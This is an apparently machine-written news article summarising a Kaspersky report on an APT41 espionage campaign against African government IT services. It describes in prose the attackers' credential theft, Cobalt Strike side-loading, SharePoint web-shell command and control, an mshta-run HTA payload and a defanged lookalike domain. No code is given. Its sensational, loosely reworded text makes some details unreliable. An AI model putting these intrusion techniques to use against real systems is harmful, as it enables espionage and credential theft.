Ethical Hacking News
A highly sophisticated espionage campaign has been attributed to APT41, with the attackers leveraging custom-built tools, living-off-the-land tactics, and a focus on targeting government IT services in Africa. Stay informed about the latest developments in cybersecurity as this threat continues to evolve.
African government IT services have been targeted by Chinese nation-state hackers. The attackers are believed to be part of the APT41 group, a prolific Chinese hacking collective. The operation is notable for its focus on Africa, which has previously been relatively unscathed by APT41's activities. The attack used a combination of hardcoded names and IP addresses, as well as custom-built tools, to bypass traditional security measures. Living-off-the-land tactics were employed, using trusted services like SharePoint to turn them into covert control channels. Credential-harvesting utilities and stealers were used to gather sensitive data and exfiltrate information via the SharePoint server.
In a shocking revelation, Chinese nation-state hackers have been identified as the masterminds behind a highly sophisticated espionage campaign targeting government IT services in the African region. According to Kaspersky researchers Denis Kulik and Daniil Pogorelov, the attackers used hardcoded names of internal services, IP addresses, and proxy servers embedded within their malware, further highlighting the brazen nature of this operation.
The APT41 group, a prolific Chinese hacking collective known for its widespread targeting of organizations across multiple sectors, has been linked to this latest campaign. With a history of infiltrating telecom and energy providers, educational institutions, healthcare organizations, and IT energy companies in more than three dozen countries, it's no surprise that the attackers have set their sights on the African region.
What makes this operation particularly noteworthy is its focus on Africa, which has been relatively unscathed by APT41's previous activities. As noted by Kaspersky, "the continent had experienced the least activity" from this specific threat actor until now. This shift in attention suggests a more deliberate and targeted approach, one that could potentially leave a lasting impact on the region's critical infrastructure.
The attack began with an investigation into suspicious activity on multiple workstations associated with an unnamed organization's IT infrastructure. The researchers discovered that the attackers were running commands to ascertain the availability of their command-and-control (C2) server, either directly or via an internal proxy server within the compromised entity. This initial reconnaissance phase laid the groundwork for the subsequent stages of the attack.
The attackers then harvested credentials associated with privileged accounts to facilitate privilege escalation and lateral movement, ultimately deploying Cobalt Strike for C2 communication using DLL side-loading. The malicious DLLs incorporated a check to verify the language packs installed on the host and proceeded with execution only if certain languages were not detected.
One notable aspect of this operation is the use of a hacked SharePoint server for C2 purposes. The attackers distributed files named agents.exe and agentx.exe via the SMB protocol to communicate with the server, each of which was actually a C# trojan whose primary function was to execute commands it received from a web shell named CommandHandler.aspx.
The attack also highlighted the use of custom-built tools alongside publicly available ones. Specifically, the attackers utilized penetration testing tools like Cobalt Strike at various stages of an attack, further emphasizing their adaptability and creativity in bypassing traditional security measures.
Furthermore, the attackers employed living-off-the-land tactics by leveraging trusted services like SharePoint to turn them into covert control channels. These behaviors align with techniques categorized under MITRE ATT&CK, including T1071.001 (Web Protocols) and T1047 (WMI), making it challenging for detection teams focused on lateral movement, credential access, and defense evasion across Windows environments.
The threat actors were also observed carrying out follow-on activity on machines deemed valuable post initial reconnaissance. This was accomplished by running a cmd.exe command to download from an external resource a malicious HTML Application (HTA) file containing embedded JavaScript and run it using mshta.exe.
The nature of the payload delivered via the external URL, which impersonated GitHub ("github.githubassets[.]net"), remains unknown. However, analysis of one previously distributed script revealed that it was designed to spawn a reverse shell, thereby granting the attackers the ability to execute commands on the infected system.
Additionally, the attackers employed stealers and credential-harvesting utilities to gather sensitive data and exfiltrate details via the SharePoint server. The tools deployed by the adversary included Pillager (albeit a modified version), Checkout, RawCopy, and Mimikatz, which were utilized to acquire information about downloaded files, credit card data saved in web browsers, raw registry files, and account credentials.
The overall impact of this operation underscores the evolving nature of modern cybersecurity threats. As threat actors continually adapt and refine their tactics, it is essential for organizations to stay vigilant and proactive in defending against such attacks.
In summary, the recent espionage campaign attributed to APT41 highlights the growing concern of Chinese nation-state hackers targeting government IT services in Africa. The use of sophisticated tools, living-off-the-land tactics, and a focus on the African region underscores the complexity and adaptability of modern cyber threats.
Related Information:
https://www.ethicalhackingnews.com/articles/China-Linked-Hackers-Unleash-Sophisticated-Espionage-Campaign-on-African-IT-Infrastructure-Leaving-Trail-of-Destruction-ehn.shtml
https://thehackernews.com/2025/07/china-linked-hackers-launch-targeted.html
Published: Mon Jul 21 18:21:03 2025 by llama3.2 3B Q4_K_M
